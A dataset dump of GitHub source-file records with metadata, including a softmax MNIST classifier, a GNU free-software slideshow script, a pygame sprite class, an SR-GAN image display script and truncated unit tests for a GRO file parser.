blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2
values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313
values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107
values | src_encoding stringclasses 20
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 4 6.02M | extension stringclasses 78
values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
3e95da268eeb27403565a04a05a979ba3c32207e | f363a2c4edd5d475701b7ef5263fdbc5dbda6ecb | /sm.py | 13b563986b32572c089d054e40c64fa734081aea | [] | no_license | michaelwiest/ucsd-cse-253-hw1 | eb9799487ee572e071d40d389a56313c09e64fae | dd95f8b0b8e31ee4e467f3e6b849170ad207c137 | refs/heads/master | 2021-05-05T15:14:17.539289 | 2018-01-18T07:57:13 | 2018-01-18T07:57:13 | 117,298,128 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,716 | py | from mnist import MNIST
import pandas as pd
import numpy as np
import pylab as plt
from helper import *
# np.set_printoptions(threshold=np.nan)
np.set_printoptions(threshold=100)
class SoftMax():
def __init__(self, mnist_directory, lr0=None, lr_dampener=None):
self.mnist_directory = mnist_directory
self.lr_dampener = lr_dampener
self.holdout_data = None
self.holdout_labels_original = None
self.target = None
self.load_data(self.mnist_directory)
print 'Loaded data...'
if lr0 == None:
self.lr0 = 0.001 / self.train_data.shape[0]
else:
self.lr0 = lr0
self.initialize_weights()
def initialize_weights(self):
self.weights = np.zeros((self.train_data.shape[1],
self.num_categories
))
def dl1(self, w):
return np.sign(w)
def dl2(self, w):
return 2 * w
def get_regularized_labels(self, labels):
potential_vals = list(set(labels))
potential_vals.sort()
return np.array([[int(l == p) for p in potential_vals] for l in labels])
def load_data(self, mnist_directory):
mndata = MNIST(mnist_directory)
tr_data, tr_labels = mndata.load_training()
te_data, te_labels = mndata.load_testing()
train_temp = np.array(tr_data)
self.train_data = np.concatenate(
(np.ones((train_temp.shape[0], 1)),
train_temp
), axis=1
)
self.train_labels = np.array(tr_labels)
test_temp = np.array(te_data)
self.test_data = np.concatenate(
(np.ones((test_temp.shape[0], 1)),
test_temp
), axis=1
)
self.test_labels = np.array(te_labels)
self.num_categories = len(list(set(self.train_labels)))
self.possible_categories = list(set(self.train_labels))
self.possible_categories.sort()
def subset_data(self, train_amount, test_amount):
if train_amount > 0:
self.train_data = self.train_data[:train_amount]
self.train_labels = self.train_labels[:train_amount]
else:
self.train_data = self.train_data[-train_amount:]
self.train_labels = self.train_labels[-train_amount:]
if test_amount > 0:
self.test_data = self.test_data[:test_amount]
self.test_labels = self.test_labels[:test_amount]
else:
self.test_data = self.test_data[-test_amount:]
self.test_labels = self.test_labels[-test_amount:]
print 'Subsetted data.'
def prefix_one(self, some_array):
return [[1] + sr for sr in some_array]
def softmax(self, x, w):
dot_exp = np.exp(np.dot(x, w))
summed = np.sum(dot_exp, axis=1)
summed = np.reshape(summed, (dot_exp.shape[0], 1))
summed = np.repeat(summed, dot_exp.shape[1], axis=1)
return (dot_exp / (1.0 * summed))
def L(self, w, x, y):
rvals = self.get_regularized_labels(y)
scores = self.softmax(x, w)
return -1 * np.sum(rvals * np.log(scores))
# return np.sum(y * np.log(self.softmax(x, w)) + (1 - y) * np.log(self.softmax(-x, w)))
def norm_loss_function(self, w, x, y):
y = self.get_regularized_labels(y)
return (-1.0 / (x.shape[0] * w.shape[1])) * np.sum(y * self.softmax(x, w))
def dl(self, w, x, y):
difference = (self.get_regularized_labels(y) - self.softmax(x, w))
return np.dot(np.transpose(x), difference)
def assign_holdout(self, percent):
percent /= 100.0
num_held = int(self.train_data.shape[0] * percent)
self.train_data = self.train_data[:-num_held]
self.train_labels = self.train_labels[:-num_held]
self.holdout_data = self.train_data[-num_held:]
self.holdout_labels = self.train_labels[-num_held:]
print 'Assigned holdout data'
def update_learning_rate(self, iteration):
if self.lr_dampener is not None:
return self.lr0 / (1.0 + iteration / self.lr_dampener)
else:
return self.lr0
def gradient_descent(self, iterations, anneal=True, log_rate=None,
l1=False, l2=False, lamb=None):
if l1 and l2:
raise ValueError('Only do l1 or l2')
if (l1 or l2) and lamb is None:
raise ValueError('Specify lambda if l1 and l2 flags on.')
self.iter_steps = []
self.train_logs = []
self.test_logs = []
self.holdout_logs = []
self.train_loss = []
self.holdout_loss = []
self.test_loss = []
self.weight_lengths = []
lr = self.lr0
for t in xrange(iterations):
if anneal:
lr = self.update_learning_rate(t)
grad = self.dl(self.weights, self.train_data, self.train_labels)
if l1:
grad -= lamb * self.dl1(self.weights)
if l2:
grad -= lamb * self.dl2(self.weights)
self.weights = np.add(self.weights, lr * grad)
if log_rate is not None:
if t % log_rate == 0:
self.weight_lengths.append(np.sum(is_close(self.weights, 0, 0.001)))
self.iter_steps.append(t)
self.train_logs.append(self.evaluate(self.weights,
self.train_data,
self.train_labels)
)
self.train_loss.append(self.norm_loss_function(self.weights,
self.train_data,
self.train_labels)
)
self.test_logs.append(self.evaluate(self.weights,
self.test_data,
self.test_labels)
)
self.test_loss.append(self.norm_loss_function(self.weights,
self.test_data,
self.test_labels)
)
if self.holdout_data is not None:
self.holdout_logs.append(self.evaluate(self.weights,
self.holdout_data,
self.holdout_labels)
)
self.holdout_loss.append(self.norm_loss_function(self.weights,
self.holdout_data,
self.holdout_labels)
)
def evaluate(self, w, x, y):
ind = np.argmax(self.softmax(x, w), axis=1)
pred = [self.possible_categories[i] for i in ind]
return 100.0 - 100.0 * np.sum((pred != y).astype(int)) / (1.0 * x.shape[0])
def train_on_number(self, num, iterations, log_rate=None, anneal=True):
self.reassign_labels_for_target(num)
self.gradient_descent(iterations, anneal=anneal, log_rate=log_rate)
def plot_logs(self):
plt.plot(self.iter_steps, self.train_logs, label='Training Data')
plt.plot(self.iter_steps, self.holdout_logs, label='Holdout Data')
plt.plot(self.iter_steps, self.test_logs, label='Test Data')
plt.ylabel('Percent classified correctly')
plt.xlabel('Iterations')
plt.title('Softmax Regression')
plt.legend(loc='lower right')
plt.show()
plt.plot(self.iter_steps, self.train_loss, label='Training Data')
plt.plot(self.iter_steps, self.holdout_loss, label='Holdout Data')
plt.plot(self.iter_steps, self.test_loss, label='Test Data')
plt.ylabel('Loss Function')
plt.xlabel('Iterations')
plt.title('Softmax Regression')
plt.legend(loc='upper right')
plt.show()
| [
"michaelwiest@Michaels-MacBook-Pro-2.local"
] | michaelwiest@Michaels-MacBook-Pro-2.local |
b23f6427b134d5142d600e52e0c2cae68943e78d | e22a9e5ae2508ba5d3fb6d786f070ea3dbbfa541 | /158A.py | 580895c4dd322c7c4ae91a58d81ebc31f46fc918 | [] | no_license | almakhann/Codeforces | 7ff14c96f1cd09f7c80c5486263aa9012bd74e92 | 9f64a14887471639aa3865ae1f0561c24471ec96 | refs/heads/master | 2022-04-19T04:16:11.160934 | 2020-04-15T16:35:09 | 2020-04-15T16:35:09 | 255,976,903 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 250 | py | first = input().split(' ')
second = input().split(' ')
count = 0
# NOTE(review): `first` (the "n k" pair) is read on the preceding line,
# which is outside this view; first[0] is n, first[1] is k.
for i in range(int(first[0])):
    # Only contestants with a strictly positive score can advance.
    if int(second[i]) > 0:
        # ...and their score must be at least the k-th place score.
        if int(second[i]) >= int(second[int(first[1])-1]):
            count += 1
print(count)
| [
"serik97_ktl@mail.ru"
] | serik97_ktl@mail.ru |
bb3d8a5f150df51b5fdef25b495d0d2462c6e144 | aae0461973440174afbf8e75e4ddf0f0c4dd1a9c | /gnu/gnu_slides.py | 1a30f50a3ee380b604a8669eeb4d4ef8b8b97991 | [] | no_license | behdad/slippy | f81eeac68df39eb0f6a7465effacd7239eb24cbf | 5535fe88a785dd75c96171b989f310fcd80e479e | refs/heads/master | 2023-08-29T08:48:40.919688 | 2016-09-27T08:02:01 | 2016-09-27T08:02:01 | 15,673,169 | 20 | 0 | null | 2014-01-10T08:09:47 | 2014-01-06T12:14:35 | Python | UTF-8 | Python | false | false | 5,180 | py | #!/usr/bin/python
# -*- coding:utf8 -*-
slides = []
def slide_add(f, data=None, width=800, height=400):
    """Register *f* in the module-level slide list and hand it back."""
    entry = (f, data, width, height)
    slides.append(entry)
    return f
import pango
def text_slide(l):
    """Add a left-aligned slide rendering the text lines in *l*.

    The generator yields each line of *l*, then 30 empty lines
    (presumably layout padding for the theme -- confirm against slippy).
    """
    def s(r):
        for line in l:
            yield line
        for _ in range(30):
            yield ''
    slide_add(s, data={'align': pango.ALIGN_LEFT})
texts = {}
texts['en'] = """“Free software” is a matter of liberty, not price. To understand the
concept, you should think of “free” as in “free speech”, not as in “free beer.”
Free software is a matter of the users' freedom to run, copy,
distribute, study, change and improve the software.
More precisely, it refers to four kinds of freedom, for the users of the
software:
------------------------------------------------------------------------------
0. The freedom to run the program, for any purpose.
1. The freedom to study how the program works, and adapt it to your needs.
Access to the source code is a precondition for this.
2. The freedom to redistribute copies so you can help your neighbor.
3. The freedom to improve the program, and release your improvements to
the public, so that the whole community benefits.
Access to the source code is a precondition for this.
------------------------------------------------------------------------------
The concept of these 4 freedoms (0-3) were developed by Richard Stallman.
To set a good example he started to write a completely free operating system.
Today Linux based GNU systems are used by millions of people around the world."""
texts['de'] = """Bei dem Begriff „Freie Software“ geht es um Freiheit, nicht um den Preis.
Um dieses Konzept richtig begreifen zu können, sollte man an „frei“ wie in
„freie Rede“ denken, und nicht an „Freibier“.
Bei „Freier Software“ geht es um die Freiheit des Benutzers die Software nach
Belieben zu benutzen, zu kopieren, weiter zu geben, die Software zu studieren,
sowie Änderungen und Verbesserungen an der Software vornehmen zu können.
------------------------------------------------------------------------------
Genauer gesagt, bezieht sich der Begriff „Freie Software“ auf vier Arten von
Freiheit, die der Benutzer der Software hat:
0. Die Freiheit, das Programm für jeden Zweck zu benutzen.
1. Die Freiheit, zu verstehen, wie das Programm funktioniert und wie man es
für seine Ansprüche anpassen kann.
Der Zugang zum Quellcode ist dafür Voraussetzung.
------------------------------------------------------------------------------
2. Die Freiheit, Kopien weiterzuverbreiten, so dass man seinem Nächsten
weiterhelfen kann.
3. Die Freiheit, das Programm zu verbessern und die Verbesserungen der
Allgemeinheit zur Verfügung zu stellen, damit die ganze Gemeinschaft davon
profitieren kann.
Der Zugang zum Quellcode ist dafür Voraussetzung.
------------------------------------------------------------------------------
Diese 4 Freiheiten (0-3) wurden so von Richard Stallman entworfen.
Um mit gutem Beispiel voran zu gehen, hat er angefangen, ein vollständig
freies Betriebssystem zu entwickeln.
Heute werden Linux basierte GNU Systeme von vielen Millionen Anwendern benutzt."""
texts['he'] = """"תוכנה חופשית" זה ענײן של חירות, לא של מחיר. כדי להבין את העקרון,
צריך לחשוב על "חופש" כמו ב"חופש הביטוי"...\
.effectpause
.back 3
ולא כמו ב"בירה חופשי".
תוכנה חופשית נוגעת לחופש של משתמשים להריץ, להפיץ הפצת-המשך, ללמוד,
לשנות ולשפר את התוכנה. ליתר דיוק, זה מתײחס לארבעה סוגים של חירות למשתמשי
התוכנה:
------------------------------------------------------------------------------
0. החופש להריץ את התוכנה, לכל מטרה שהיא.
1. החופש ללמוד איך תוכנה עובדת, ולשנות אותה לצרכיהם.
גישה לקוד המקור היא תנאי מקדים לכך.
2. החופש להפיץ עותקים בהפצה-חוזרת כדי שיוכלו למשל לעזור לשכנים שלהם.
3. החופש לשפר את התוכנה, ולשחרר את השיפורים שלהם לציבור, כך שכל הקהילה תרויח.
גישה לקוד-המקור היא תנאי מקדים לכך.
------------------------------------------------------------------------------
The concept of these 4 freedoms (0-3) were developed by Richard Stallman.
To set a good example he started to write a completely free operating system.
Today Linux based GNU systems are used by millions of people around the world."""
import os, re
lang = os.getenv ('LANG')
# Reduce a full locale such as "de_DE.UTF-8" to its bare language code.
i = lang.find ('_')
if i > 0:
    lang = lang[:i]
# Fall back to English when no translation exists for the locale.
text = texts.get (lang, texts['en'])
def break_on_dashlines(text):
    """Yield chunks of *text* delimited by separator lines of 3+ dashes.

    A separator line consists solely of three or more '-' characters; it
    is consumed, not emitted.  The trailing chunk is always yielded, even
    when it is empty.
    """
    # Compile once instead of re-matching the literal pattern per line;
    # '-{3,}' is the explicit form of the original '----*'.
    separator = re.compile(r'^-{3,}$')
    chunk = ''
    for line in text.split('\n'):
        if separator.match(line):
            yield chunk
            chunk = ''
        else:
            if chunk:
                chunk += '\n'
            chunk += line
    yield chunk
# Build one slide per dash-delimited chunk of the selected translation.
for slide in break_on_dashlines (text):
    text_slide (slide)
if __name__ == "__main__":
    # Run as a standalone, auto-advancing, looping slideshow.
    import slippy
    import gnu_theme
    slippy.main (slides, gnu_theme, args = ['--slideshow', '--delay', '0.05', '--repeat'])
| [
"behdad@behdad.org"
] | behdad@behdad.org |
4c8f7e6ae2aeddd5c42226129d42c4cb4aab080a | 3ab599127dc2fc89cfee5f3ee3a91168499cb475 | /tests/notebooks/print.py | f53c6110196004fd9f0397077b033b4cca94f792 | [
"BSD-3-Clause"
] | permissive | maartenbreddels/voila | 17dfb39c131ffad4b3b51926214dc71a2e06a964 | d3a52abdd34b68bdabdd8f0ae34071711cd16742 | refs/heads/master | 2022-05-11T05:47:44.843627 | 2020-09-28T09:58:37 | 2020-09-28T09:58:37 | 149,579,689 | 2 | 1 | NOASSERTION | 2020-05-27T07:59:20 | 2018-09-20T08:50:19 | Python | UTF-8 | Python | false | false | 284 | py | # ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.4'
# jupytext_version: 1.2.1
# kernelspec:
# display_name: Python 3
# language: python
# name: python
# ---
# Smoke-test cell: this output is what Voilà renders for the notebook.
print('Hi Voilà!')
| [
"maartenbreddels@gmail.com"
] | maartenbreddels@gmail.com |
1106db283ff566d316750ba1076bb9539d901e37 | 3f2639c02a3658c43c7bf971069883d23239e8b9 | /100+ Exercises Solved/Question - 5.py | 9348976ab4f0a6b6acd1310d9a00ef9d8640159a | [] | no_license | Ellipse404/100-Exercises-Python-Programming- | 0da5882b23ce4a050fe952db8302cc0041241870 | d00e966aeb3d6c5870c89f8606fdc32bae964fe5 | refs/heads/master | 2021-05-24T11:54:08.237919 | 2020-04-06T16:10:38 | 2020-04-06T16:10:38 | 253,547,718 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 718 | py | # -*- coding: utf-8 -*-
"""
Created on Tue Jul 16 16:54:45 2019
@author: BHASKAR NEOGI
"""
# Level - 1
class String(object):
    """Read a line of text from the user and echo it in upper case."""

    def __init__(self):
        # Start with an empty value so printString is safe before getString.
        self.s = ""

    def getString(self):
        """Store one line read from standard input."""
        self.s = input("Enter The Value To Convert into String : ")

    def printString(self):
        """Write the stored text, upper-cased, to standard output."""
        print("Output : ", self.s.upper())
# Demo driver: prompt for a string, then print it upper-cased.
k = String()
k.getString()
k.printString()
| [
"noreply@github.com"
] | noreply@github.com |
3beb6d4f595049104745ef63df90443dbd500e9d | cd4f3bd30bb4e85fc824e21defbb950f42e2f103 | /Item/Couches.py | 9afd515a399502727c11322bc201379024d5c455 | [] | no_license | XelekGakure/ReceipAdministrator | db727a55479b4bf65ae2e4c1530091821c415bb5 | 7338db681fdb210ffe5e456eedfa54b5e91c05a4 | refs/heads/master | 2021-01-08T03:43:56.613347 | 2020-02-20T14:27:32 | 2020-02-20T14:27:32 | 241,902,683 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 117 | py | from Item import Item
class Couches(Item):
    """Catalogue entry for diapers ("couches")."""
    # Arguments are presumably (price, label) per the Item base class --
    # confirm against Item's constructor signature.
    def __init__(self) -> None:
        super().__init__(15, "Couches")
| [
"julien.lauret.pro@gmail.com"
] | julien.lauret.pro@gmail.com |
20d0c280fe8495075d08fc145034ff128292e4f0 | 300454fee89ca862fcdef2da93e1034398642291 | /display.py | ce4a7c3909f815f129185b1693ea5233721227c4 | [
"MIT"
] | permissive | mehranjeelani/SR_gan | 238982092e7d8134a20aea54c610a5db5d490878 | abd835ff265054838205869bbdad63d87745b5e0 | refs/heads/master | 2022-12-02T10:27:12.262593 | 2020-08-08T07:24:26 | 2020-08-08T07:24:26 | 275,428,468 | 0 | 0 | MIT | 2020-07-18T00:26:36 | 2020-06-27T18:12:13 | Python | UTF-8 | Python | false | false | 3,584 | py | import argparse
import os
from math import log10
import pandas as pd
import torch.optim as optim
import torch.utils.data
import torchvision.utils as utils
from torch.autograd import Variable
from torch.utils.data import DataLoader
from tqdm import tqdm
import torch.nn as nn
import pytorch_ssim
from data_utils import TrainDatasetFromFolder, ValDatasetFromFolder, display_transform
from loss import GeneratorLoss
from model import Generator, Discriminator
def weights_init(m):
    """DCGAN-style initialiser, applied via model.apply(weights_init).

    Conv* layers get N(0, 0.02) weights; BatchNorm* layers get
    N(1, 0.02) weights and zero bias.  Other modules are untouched.
    """
    name = m.__class__.__name__
    if 'Conv' in name:
        nn.init.normal_(m.weight.data, 0.0, 0.02)
    elif 'BatchNorm' in name:
        nn.init.normal_(m.weight.data, 1.0, 0.02)
        nn.init.constant_(m.bias.data, 0)
#torch.autograd.set_detect_anomaly(True)
# Command-line options: crop size, SR upscale factor, dataset and noise case.
parser = argparse.ArgumentParser(description='Train Super Resolution Models')
parser.add_argument('--crop_size', default=80, type=int, help='training images crop size')
parser.add_argument('--upscale_factor', default=4, type=int, choices=[2, 4, 8],
                    help='super resolution upscale factor')
parser.add_argument('--num_epochs', default=200, type=int, help='train epoch number')
parser.add_argument('--data_set',default='Pascal_VOC',type=str,help='training dataset')
parser.add_argument('--case',default = 'train_with_noise_std_1',type = str,help = 'noise type')
# Optimiser hyper-parameters; unused in this snapshot, which only renders images.
lr = 0.0002
beta1 = 0.5
best_model = None
best_gen = None
if __name__ == '__main__':
    opt = parser.parse_args()
    CROP_SIZE = opt.crop_size
    UPSCALE_FACTOR = opt.upscale_factor
    NUM_EPOCHS = opt.num_epochs
    DATASET = opt.data_set
    CASE = opt.case
    # Dataset wrappers come from the project-local data_utils module.
    train_set = TrainDatasetFromFolder('data/train/'+DATASET+'/train_HR', crop_size=CROP_SIZE, upscale_factor=UPSCALE_FACTOR)
    val_set = ValDatasetFromFolder('data/train/'+DATASET+'/valid_HR', upscale_factor=UPSCALE_FACTOR)
    train_loader = DataLoader(dataset=train_set, num_workers=4, batch_size=64, shuffle=True)
    val_loader = DataLoader(dataset=val_set, num_workers=4, batch_size=1, shuffle=False)
    out_path = 'training_results/'+DATASET+'/SRF_' + str(UPSCALE_FACTOR) + '/'+CASE+'/'
    if not os.path.exists(out_path):
        os.makedirs(out_path)
    # Inference only: assemble LR / restored-HR / HR image triptychs for the
    # validation split and save them as grids.
    with torch.no_grad():
        val_bar = tqdm(val_loader)
        val_images = []
        for val_lr, val_hr_restore, val_hr in val_bar:
            batch_size = val_lr.size(0)
            # NOTE(review): `lr` here shadows the module-level learning rate.
            lr = val_lr
            hr = val_hr
            if torch.cuda.is_available():
                lr = lr.cuda()
                hr = hr.cuda()
            val_images.extend(
                [display_transform()(val_lr.squeeze(0)),display_transform()(val_hr_restore.squeeze(0)),
                 display_transform()(hr.data.cpu().squeeze(0))])
            val_bar.set_description('Generating SR images for validation set')
        val_images = torch.stack(val_images)
        #print('total number of images are {} total number of chunks are {}'.format(val_images.size(0),val_images.size(0)//15))
        # 15 images per grid = five LR/restored/HR rows of three.
        val_images = torch.split(val_images, 15)
        #print('bfore tqdm val images shape is {}'.format(val_images[0].shape))
        # [:-1] drops the final (possibly ragged) chunk so every grid is full.
        val_save_bar = tqdm(val_images[:-1], desc='[saving validation SR images]')
        #print('images per chunk:{}'.format( val_save_bar[0].shape))
        index = 1
        for image in val_save_bar:
            #print('image shpae is {}'.format(image.shape))
            image = utils.make_grid(image, nrow=3, padding=5)
            utils.save_image(image, out_path + 'index_%d_%s.png' % (index,CASE), padding=5)
            index += 1
"mehranjeelani@gmail.com"
] | mehranjeelani@gmail.com |
d7d088644cfa61a4680b4b1b727799c44e89f857 | 67d0f6bfe81bae6aa32d179de1a3a5f8e14b11d1 | /extranet/migrations/0003_student_group.py | e5ecda2cc9d8323692940499a3d8baebeb00440e | [] | no_license | jakubmisiak/wsb-programowanie-obiektowe | 386e1d36679d2c65cdd3f344a8b9a681e34a3b19 | 5eb46b738fb5c2d72f056dd47721cc7fe7909b65 | refs/heads/main | 2023-03-25T20:19:45.577350 | 2020-12-16T21:22:02 | 2020-12-16T21:22:02 | 352,344,593 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 525 | py | # Generated by Django 3.1.4 on 2020-12-04 20:50
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('auth', '0012_alter_user_first_name_max_length'),
('extranet', '0002_student'),
]
operations = [
migrations.AddField(
model_name='student',
name='group',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='auth.group'),
),
]
| [
"noreply@github.com"
] | noreply@github.com |
e85424d2b73d54e38f10a2da90d91825bc10d932 | 173b16ed4476557501145e149b0426e2e28aaacb | /doodlebob.py | dcf7d51ace2bea05cd43e00db46b74596d899ad7 | [] | no_license | jlovoi/doodlebob_adventures | 3ebcb61872c1fec90451a962d7f0f1777cb9f326 | d125c26d801a21d685be706fe1c83c43e0e1747e | refs/heads/master | 2021-09-05T21:20:26.437298 | 2018-01-31T03:30:22 | 2018-01-31T03:30:22 | 119,625,734 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,296 | py | import pygame
class Doodle():
"""settings for doodle placement"""
def __init__(self, settings, screen):
self.screen = screen # need doodle.screen in order to reference/use the original screen
self.settings = settings
self.image = pygame.image.load('images/doodlebob.bmp')
self.rect = self.image.get_rect()
self.screen_rect = screen.get_rect()
# set position for doodlebob
self.rect.centerx = self.screen_rect.centerx # these are part of the API
self.rect.bottom = self.screen_rect.bottom
# Decimal value for doodle.rect, since it is currently stored as integer
self.center = float(self.rect.centerx)
# Set moving flags as False
self.moving_right = False
self.moving_left = False
def update(self):
"""update movement of Doodlebob based on moving flags"""
if self.moving_right and self.rect.right < self.screen_rect.right:
self.center += self.settings.doodle_speed_factor
if self.moving_left and self.rect.left > 0:
self.center -= self.settings.doodle_speed_factor
# Update the position of the ship
self.rect.centerx = self.center
def blitme(self):
"""Draw doodle at current position"""
self.screen.blit(self.image, self.rect)
def center_doodle(self):
"""Center doodle at bottom of screen"""
self.center = self.screen_rect.centerx | [
"jlovoi@Josephs-MacBook-Pro.local"
] | jlovoi@Josephs-MacBook-Pro.local |
87bb2d668f30b7eb6f87e3194c21c258c21263f5 | 9a48c9dd431b1bcae0c338f5075177d4dcf9c71b | /lib/stats.py | 870441dd6c9c0ff71862228a041515c96c241420 | [
"ICU",
"MIT"
] | permissive | ravikt/OpticalFlowToolkit | f683f1932f07f76ab50e4c338f08205cc8aa2eb7 | 410246072c0de7e5e071c30682674a0b6186d74e | refs/heads/master | 2020-06-08T17:19:02.421818 | 2019-06-22T19:22:16 | 2019-06-22T19:22:16 | 193,271,247 | 0 | 0 | MIT | 2019-06-22T19:19:00 | 2019-06-22T19:19:00 | null | UTF-8 | Python | false | false | 635 | py | #!/usr/bin/python
"""
stats.py
This file generates data statistics
Author : Ruoteng Li
Date 16 Oct 2016
"""
import numpy as np
import os
from PIL import Image
full = 196608
input_dir = '../../../data/FC/data'
output_dir = '../SegNet/CamVid/trainflowannot'
files = os.listdir(output_dir)
files.sort()
stats = [0, 0, 0, 0, 0, 0, 0, 0, 0]
for j in range(22276):
file_name = files[j]
img = Image.open(os.path.join(output_dir, file_name))
data = np.array(img)
for i in range(9):
idx = (data == i)
stats[i] += float(np.sum(idx)) / full
for i in range(len(stats)):
stats[i] /= 22276
print stats[i] | [
"liruoteng@gmail.com"
] | liruoteng@gmail.com |
3d0dc04dc9e883dc6cccaa6b0935ef9c431fc6cc | adeee7988d712c7670d9743b4b4a0d52d62da9c9 | /nvesta/api/views/v1/__init__.py | 97e76cc77702bb3f22fa758e2475e80167062aca | [] | no_license | MarsStirner/nvesta | 632d040fa45c4d3b6e4a65bf1085935a27bdbd1d | d36d5e4b9403e4692dde276b43962e0430657a76 | refs/heads/master | 2020-12-03T00:33:45.775802 | 2016-08-19T09:28:34 | 2016-08-19T09:28:34 | 96,042,844 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 98 | py | # -*- coding: utf-8 -*-
from . import apiutils, dictionary, hs, kladr
__author__ = 'viruzzz-kun'
| [
"m.malkov@bars-open.ru"
] | m.malkov@bars-open.ru |
cab3722b1448cd41cbd498434b184e0056ab54bd | c5c0d18688c5a4b0f2cd9fb73e3591c09af39230 | /agrost/apps.py | 5fc917b860cf40a27117cdf998a62e2220f516f3 | [] | no_license | AmitGamot/Agri-Analytics | 69b1b92172845f7e734d5b2f12bba9731dbf4dcb | c314357bc2c91fe19bc312f9aae6789acc35751a | refs/heads/master | 2023-05-26T23:35:59.138568 | 2021-05-30T05:32:00 | 2021-05-30T05:32:00 | 370,703,149 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 87 | py | from django.apps import AppConfig
class AgrostConfig(AppConfig):
    """Django application configuration for the `agrost` app."""
    name = 'agrost'
| [
"amitgamot05@gmail.com"
] | amitgamot05@gmail.com |
c5e98de5ca67d6b8ad2c8ba8c594dfe40d51ba48 | 2f83cebda902ad0ae60f6b4eb6b6f37742671e1d | /tests/test_groio.py | 8a66bb8c99d6d3162040028b58112dfbb0697bc2 | [
"MIT"
] | permissive | jbarnoud/groio | ccb5eb381979927e393e3235fff2fef99148b44f | f387c42c067db1466114e775640440371c381f6d | refs/heads/master | 2021-01-24T00:03:32.627337 | 2015-09-11T13:16:42 | 2015-09-11T13:16:42 | 42,727,769 | 1 | 1 | null | 2015-09-18T14:38:08 | 2015-09-18T14:38:07 | null | UTF-8 | Python | false | false | 6,389 | py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
"""
Unit tests for groio library
"""
from __future__ import division, print_function
import unittest
import os
import sys
import contextlib
import groio
__author__ = "Hubert Santuz & Jonathan Barnoud"
# Path to the directory containing the material for tests
REFDIR = os.path.join(os.path.dirname(__file__),"test_resources")
# Gro files usually store coordinates with decimals. Let's be precise
# until the fourth one.
PRECISION = 4
class TestReadWrite(unittest.TestCase):
    """
    Test for reading and writing a GRO file.
    """

    def test_read(self):
        """
        Test the reading of a regular gro file
        """
        path = os.path.join(REFDIR, "regular.gro")
        title, atoms, box = groio.parse_file(path)
        nb_atoms = len(atoms)
        self.assertEqual(title, "Regular AA\n")
        self.assertEqual(box, " 5.15414 5.15414 7.93645\n")
        self.assertEqual(nb_atoms, 14961)
        # Pick a random atom
        # 24POPC C220 1235 2.520 4.888 3.113
        atom = atoms[1234]
        keys_tested = ['resid', 'atomid', 'x', 'z']
        values_tested = [24, 1235, 2.520, 3.113]
        for key, value in zip(keys_tested, values_tested):
            self.assertEqual(atom[key], value)

    def test_fail_read(self):
        """
        Test the bad formating of a gro file
        """
        files = ["fail.gro", "fail_100000.gro", "missing_total_atoms.gro"]
        files_desc = [os.path.join(REFDIR, filin) for filin in files]
        # NOTE(review): leftover debug print; consider removing.
        print(files_desc)
        for filin in files_desc:
            with self.assertRaises(groio.FormatError) as context:
                groio.parse_file(filin)
            # NOTE(review): this compares a str to the exception *object*;
            # str(context.exception) is almost certainly what was intended.
            self.assertEqual("Something is wrong in the format", context.exception)

    def test_write(self):
        """
        Test the writing of a gro file
        """
        # Create a random file
        title, atoms, box = _generate_file()
        # Write it
        test_write = os.path.join(REFDIR, "test_write.gro")
        with open(test_write, "w") as fout:
            for line in groio.write_gro(title, atoms, box):
                print(line, end='', file=fout)
        # Reference file
        ref_write = os.path.join(REFDIR, "write.gro")
        with open(ref_write) as f1, open(test_write) as f2:
            ref_readlines = f1.readlines()
            test_readlines = f2.readlines()
        self.assertEqual(ref_readlines, test_readlines)
        os.remove(test_write)
def _generate_file():
"""
Generate the header and atoms of a random gro file.
Match the file write.gro to test purposes.
:Returns:
- title: the title of the system
- atoms: a list of atom, each atom is stored as a dictionary
- box: the box description
"""
title = "Write\n"
atoms = []
atoms.append({'resid': 1, 'resname': "POPC", 'atom_name': "C31",
'atomid': 1, 'x': 1.764, 'y': 4.587, 'z': 2.046})
atoms.append({'resid': 1, 'resname': "POPC", 'atom_name': "N1",
'atomid': 2, 'x': 1.824, 'y': 4.555, 'z': 1.916})
atoms.append({'resid': 1, 'resname': "POPC", 'atom_name': "C32",
'atomid': 3, 'x': 1.755, 'y': 4.436, 'z': 1.864})
atoms.append({'resid': 1, 'resname': "POPC", 'atom_name': "C33",
'atomid': 4, 'x': 1.954, 'y': 4.503, 'z': 1.960})
box = " 1.000 1.000 1.000\n"
return (title, atoms, box)
class TestGrolib(unittest.TestCase):
    """
    Tests for the other functions in the library.
    """

    def test_renumber(self):
        """
        Test the atom renumbering with the renumber function
        """
        path = os.path.join(REFDIR, "regular.gro")
        title, atoms, box = groio.parse_file(path)
        removed_res = (10, 50, 60)
        # Remove some residues and renumber atoms and residues
        renumbered = _create_runumbered(atoms, removed_res)
        # Check numbering
        # (number of atom per residue, number of residue)
        topology = ((52, 72 - len(removed_res)), (3, 3739))
        _test_renumber(renumbered, topology)
def residue_numbers(topology, start_res=1):
    """Yield one residue number per atom, following *topology*.

    *topology* describes successive runs of residues as
